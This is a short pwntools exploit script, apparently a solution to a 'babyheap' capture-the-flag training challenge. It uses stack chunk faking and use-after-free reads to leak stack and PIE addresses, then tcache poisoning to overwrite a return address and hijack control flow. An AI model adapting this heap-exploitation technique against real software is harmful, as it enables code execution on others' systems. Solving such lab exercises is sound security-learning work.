from pwn import *

r = process("/challenge/babyheap_level14.0")
r.sendline(b"malloc")
r.sendline(b"1")
r.sendline(b"300")
r.sendline(b"stack_scanf")
r.sendline(b'A'*48+p64(0x0)+p64(0x141))
r.sendline(b"stack_free")
r.sendline(b"malloc")
r.sendline(b"0")
r.sendline(b"300")
r.sendline(b"free")
r.sendline(b"0")
r.sendline(b"free")
r.sendline(b"1")
r.sendline(b"echo")
r.sendline(b"1")
r.read()
r.sendline(b"0")
print(r.read())
leak = r.read()[6:-1]
leak = int.from_bytes(leak,byteorder='little')
log.info(f"Run The Script multiple times to defeat the PIE")
log.info(f"Stack Addr Leak {hex(leak)}")
ret_addr = leak+88
r.sendline(b"echo")
r.sendline(b"0")
r.sendline(b"56")
r.read()
basse_addr = r.read()[6:-1]
basse = int.from_bytes(basse_addr,byteorder='little')
basse = str(hex(basse))[:-3] + "a22"
log.info(f"Basse Addr Func {basse}")
basse = int(basse,16)
r.sendline(b"scanf")
r.sendline(b"1")
r.sendline(p64(ret_addr))
for alloc in range(0,2):
	r.sendline(b"malloc")
	r.sendline(str(alloc).encode())
	r.sendline(b"300")
r.sendline(b"scanf")
r.sendline(b"1")
r.sendline(p64(basse))
r.sendline(b"quit")
r.interactive()
